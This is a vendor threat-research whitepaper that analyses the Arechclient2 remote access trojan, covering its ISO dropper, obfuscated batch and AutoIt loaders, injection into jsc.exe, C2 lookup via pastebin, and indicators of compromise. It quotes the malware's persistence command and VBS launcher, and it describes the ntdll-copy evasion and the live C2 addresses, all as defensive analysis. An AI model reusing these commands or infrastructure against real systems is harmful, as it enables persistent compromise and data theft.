WHITEPAPER Ratting Out Arechclient2 RAT TING OUT ARECHCLIENT 2 WHITEPAPER Learn more at blackpointcyber.com 1 Executive Summary Blackpoint Cyber recently uncovered an ISO file containing a malicious Windows executable being downloaded to a customer endpoint that wasn’t detected by antivirus (AV). The malicious Windows executable, named Setup.exe, was executed and observed using various defense evasion techniques including injection, obfuscation, and uncommon automation tools to eventually drop a remote access tool (RAT) named Arechclient2. Arechclient2 is a .NET RAT reported to have numerous capabilities including multiple stealth functions. Blackpoint observed the acquired malicious executable profiling victim systems, stealing information such as browser and crypto-wallet data, and launching a hidden secondary desktop to control browser sessions, which aligns closely with reports from others such as the Center for Internet Security (CIS). http://www.blackpointcyber.com RAT TING OUT ARECHCLIENT 2 WHITEPAPER Learn more at blackpointcyber.com 2 Analysis Initial Access The initial pre-text given to the victim is unknown at this time, however, the victim was manipulated into downloading Setup.iso. When double-clicked, the ISO can be mounted like a CD and oftentimes the contents are automatically executed. Within the ISO was an executable named Setup.exe with a size over 300 megabytes (see Figure 1). Figure 1: Contents of Mounted ISO File Figure 2: Die resource analysis Examining the Resources section of the executable with the tool Die shows keywords commonly used in Windows installer files (see Figure 2). http://www.blackpointcyber.com RAT TING OUT ARECHCLIENT 2 WHITEPAPER Learn more at blackpointcyber.com 3 Execution Executing Setup.exe will trigger the extraction of three files and execute multiple child processes as seen in the Procmon process tree below (see Figure 3). Figure 3: Procmon Process Tree View A new folder named IXP000.TMP is created in the victim’s AppData\Local\Temp directory and three files are extracted into it: • Funding.mpeg • Mali.mpeg • Dns.mpeg These files are in the Resources section labeled “CABINET” (see Figure 4). Figure 4: “CABINET” Resources Section http://www.blackpointcyber.com RAT TING OUT ARECHCLIENT 2 WHITEPAPER Learn more at blackpointcyber.com 4 Figure 5 was taken using ProcDOT and visualizes the process flow of Setup.exe extracting the three files. The first process executed by Setup.exe is robocopy.exe with an argument of 8927387376487263745672 673846276374982938486273568279384982384972834. If CreateProcessA Windows API fails to execute robocopy, the Setup.exe process will clean up all files that were extracted and exit. Below is a snippet of the decompiled subroutine responsible for creating the process (see Figure 6). The robocopy command will fail every time without a valid source and destination argument. It’s important to note that malware authors aren’t always perfect with their intentions and make mistakes. The next command is: cmd /c cmd < Dns.mpeg Dns.mpeg is a heavily obfuscated batch script. Below is a snippet from the script to show the author’s intent to bypass any AV signature analysis (see Figure 7). Figure 5: ProcDOT Output of Extracted Files Figure 6: Function Responsible for Starting Robocopy http://www.blackpointcyber.com RAT TING OUT ARECHCLIENT 2 WHITEPAPER Learn more at blackpointcyber.com 5 When decoded, the commands seen in the script align (see Figure 8) with the child processes that were seen in the process tree in Figure 3. Figure 7: Obfuscated Dns.mpeg Batch Script Figure 8: Decoded Dns.mpeg Batch Script Obfuscation The script searches for AvastUI.exe and AVGUI.exe running on the system. These are processes found in the Avast antivirus line of products. If not found, it sets Hole.exe.pif to the name AutoIT3.exe, writes MZ to the beginning of Hole.exe.pif and then writes the contents of Funding.mpeg into Hole.exe.pif. Finally, Mali.mpeg is renamed to v.a3x and the command “Hole.exe.pif v” is executed, followed by a ping command. AutoIT3.exe is a tool used for automation that has its own scripting language. The scripts have an extension of .au3 or.a3x and can be compiled for quicker processing. Funding.mpeg is the AutoIT3.exe executable and Mali.mpeg is the script argument. The .au3 or d.au3 script is heavily obfuscated and contains dead code to make reverse engineering more difficult. Throughout the script there are over 3,000 references to a defined function named Xspci() (see Figure 9). The function takes a string as the first argument and a number as the second argument and is responsible for decoding strings. http://www.blackpointcyber.com RAT TING OUT ARECHCLIENT 2 WHITEPAPER Learn more at blackpointcyber.com 6 Figure 9: Example Function Call to Xspci Figure 10: Dumping Decoded Strings to a File Strings were extracted from the script by appending the following two lines to the end of the function (see Figure 10). The lines added to the end of the function will open a file on the local testing machine, in this case, “out.txt,” and write both the encoded and decoded strings to the file. This helps speed up analysis of the script file and filter out the noise. Figure 11 below is an example of the resulting file. # Obtain a handle to the output file for writing. $handle = FileOpen(“C:\Users\User\AppData\Local\Temp\siFtwoLbXE\out.text”, 1) # Write “ = ” on a new line FileWriteLine($handle, $DhzkAIs & “ = “ & $bIitoyr) Figure 11: out.txt http://www.blackpointcyber.com RAT TING OUT ARECHCLIENT 2 WHITEPAPER Learn more at blackpointcyber.com 7 Injection The .au3 script is responsible for three things: 1. Establishing persistence using a URL file in the victim’s startup folder. 2. Copying ntdll.dll from the C:\Windows\SysWOW64 folder to avoid AV hooks when using exported APIs. 3. Injecting the embedded payload into jsc.exe. The major function that accomplishes the above is KXsObHGILZNaOurxqSUainCYU()which takes three arguments (see Figure 12): 1. A pointer to the binary to be injected. 2. A string argument (was empty during testing). 3. Another string argument with the path to the binary that would be executed and injected into. Figure 12: Major Injection Function The script first establishes persistence by adding a URL file to the victim’s startup folder that will execute a VBS script on every login. cmd /c echo “[InternetShortcut]” > “%APPDATA%\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sgYzDqWyiP.url” & echo ‘URL=”%APPDATA%\Local\Temp\siFtwoLbXE\pyIJlxBJlwEWd.vbs”’ >> “%APPDATA%\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sgYzDqWyiP.url” Contents of sgYzDqWyiP.url [InternetShortcut] URL=”C:\Users\\AppData\Local\Temp\siFtwoLbXE\pyIJlxBJlwEWd.vbs” Contents of pyIJlxBJlwEWd.vbs p = GetObject(“winmgmts:\\.\root\cimv2:Win32_Process”).Create(“C:\\ Users\\\\AppData\\Local\\Temp\\siFtwoLbXE\\sgYzDqWyiP.exe.com d” , “C:\\Users\\\\AppData\\Local\\Temp\\siFtwoLbXE”, null, null) http://www.blackpointcyber.com RAT TING OUT ARECHCLIENT 2 WHITEPAPER Learn more at blackpointcyber.com 8 The VBS script is the same as the previous command: Hole.exe.pif v • SgYzDqWyiP.exe.com is AutoIT3.exe • d is the .au3 script The script copies ntdll.dll to the current working folder and names it fyoNUfeL.dll. In Figure 13, the encoded strings have been replaced with the decoded versions for clarity. Figure 13: FileCopy ntdll.dll to fyoNUfeL.dll Using the AutoIT script function DllCall(), it resolves specific exported functions from fyoNUfel.dll (ntdll.dll). The functions listed below were discovered in the decoded strings output file and are responsible for injecting and executing the final payload: • NtReadVirtualMemory • NtWriteVirtualMemory • NtProtectVirtualMemory • NtSetContextThread The script executes the program jsc.exe, which is a .NET tool used to compile JScript files into executables or DLLs. The executable is considered a “lolbin” (Living-off-the-land binary) but in this case it takes no arguments and is simply used as a target for injection. Once the program is running, another .NET executable named Test.exe is injected into jsc.exe as a loaded module. However, the name of Test.exe is changed to jsc.exe. Figure 14 shows a screenshot of loaded modules in jsc.exe. There should only be one loaded jsc.exe, which is the image itself, however, there are two. Figure 14: Two jsc.exe Modules http://www.blackpointcyber.com RAT TING OUT ARECHCLIENT 2 WHITEPAPER Learn more at blackpointcyber.com 9 Dumping the jsc.exe process and examining it in WinDbg shows the original file name in Figure 15. Figure 15: jsc.exe Dump Decompilation Since Test.exe is a C# binary, it can be loaded into a tool like DnSpy for static and dynamic code analysis (see Figure 16). The class names have been minimized to single and double characters to create an additional layer of confusion for reverse engineers. The actual name of the executable is 2qbarx12tqm.exe version 1.0.0.0. Figure 16: DnSpy Decompilation http://www.blackpointcyber.com RAT TING OUT ARECHCLIENT 2 WHITEPAPER Learn more at blackpointcyber.com 1 0 Command and Control When the RAT is executed, it reaches out to https[:]//pastebin.com/raw/nJqnWX3u to retrieve C2 information (see Figure 17). The requested file, nJqnXW3u, contains the IP address 34.141.198.105 as a string. It also reaches out to http[:]//eth0.me to get its public IP address. To receive commands, it connects to its C2 server on port 15647. The server responds with information to set the encryption status from “On” to “Off” in JSON format. Figure 17: C2 Comms with Encryption If the communications are intercepted and the encryption status is set to “Off,” all further communications will be in plain text (see Figure 18). http://www.blackpointcyber.com RAT TING OUT ARECHCLIENT 2 WHITEPAPER Learn more at blackpointcyber.com 1 1 Figure 18: C2 Traffic Without Encryption Comparing this traffic to known C2 traffic patterns shows an alignment with Arechclient2 traffic: https://github.com/silence-is-best/c2db. While the C2 channel is still live at the time of this writing, there was no active follow-up on commands observed on the testing machine once the RAT established a connection. http://www.blackpointcyber.com https://github.com/silence-is-best/c2db RAT TING OUT ARECHCLIENT 2 WHITEPAPER Learn more at blackpointcyber.com 1 2 Conclusion Adversaries are becoming more advanced in their methods of bypassing AV by using publicly available tools such as AutoIT3 and native operating system tools. Therefore, it’s become increasingly important in today’s threat landscape to have the capability to detect advanced tradecraft. Arechlient2 is not a new threat. However, it is not commonly viewed as a choice for remote access tools and in this case, was the result of a drive-by download. While malware like this is not used as a targeted means of attack, it does not reduce the risk that malicious binaries like this pose. File Indicators of Compromise SHA256 4A81FED5DB0727E54B39402A9954804E8AE39F26FCE13ACE9300141ABEEE4E8A Name jsc.exe/Test.exe File Type Executable Size 639 KB SHA256 71B57570867E7ABD79A9011B19B2EFCA2B069E8AAFBB1BEF601CD65E3D7DFC79 Name Dns.mpeg File Type Batch Script Size 11 KB SHA256 3E26723394ADE92F8163B5643960189CB07358B0F96529A477D37176D68AA0A0 Name Hole.exe.pif File Type Executable Size 925 KB SHA256 FFE6FEB6677FB58013BBB5D42EACAACFBB939F803D649268F7427EA6E5262356 Name fyoNUfeL.dll File Type DLL Size 2 MB http://www.blackpointcyber.com RAT TING OUT ARECHCLIENT 2 WHITEPAPER Learn more at blackpointcyber.com 1 3 SHA256 3E26723394ADE92F8163B5643960189CB07358B0F96529A477D37176D68AA0A0 Name Funding.mpeg File Type Raw Data Size 925 KB SHA256 DB4E1935D1D1DFAE7F87147D0FB90405326380E09A30E869BFCFE0CD64B92B1E Name Mali.mpeg or v or d File Type AutoIT Script Size 2 MB SHA256 3E26723394ADE92F8163B5643960189CB07358B0F96529A477D37176D68AA0A0 Name sgYzDqWyiP.exe.com File Type Executable Size 925 KB URL / IP ADDRESS PORT DESCRIPTION DATE LAST ACCESSED 34.141.198.105 15647 C2 09/27/2022 https[:]//pastebin.com/raw/nJqnXW3u 443 Retrieve C2 IP 09/27/2022 http[:]//eth0.me 80 Retrieve public IP 09/27/2022 Network IOCs http://www.blackpointcyber.com Founded in 2014 by former National Security Agency (NSA) cyber operations experts, the Blackpoint team continues to bring nation-state-grade technology and tactics to our partners around the world. By fusing real security with real response, our elite SOC team is empowered by the proprietary technology we built from the ground up. Together, we detect breaches faster than any other solution on the market. With insight into network visualization, tradecraft detection, endpoint security, suspicious events, and remote privileged activity, Blackpoint detects lateral movement in its earliest stages and stops the spread. By the time you hear from us, the threat has been triaged and removed, often before the malicious actor even saw us coming. Lastly, we optimize our architecture and data to its fullest extent, ensuring robust services and valuable intel for our partners. That way, all facets of security—response, logging, cloud protection, and cyber insurance— can work in tandem to support an integrated cyber strategy. Sleep easy knowing we detect and detain threats on your behalf around the clock. Why Blackpoint Cyber? SIGN UP FOR A DEMO TODAY! Our mission? To provide unified, 24/7 detection and response services to organizations of all sizes around the world. CONTACT US info@blackpointcyber.com blackpointcyber.com https://blackpointcyber.com/lp/book-demo/?utm_campaign=discovery_of_arechclient2_whitepaper&utm_source=cta_button mailtO:info@blackpointcyber.com https://blackpointcyber.com https://www.facebook.com/BlackpointCyber/ https://www.youtube.com/c/BlackpointCyber/ https://twitter.com/blackpointus https://www.linkedin.com/company/blackpoint https://www.instagram.com/blackpointcyber/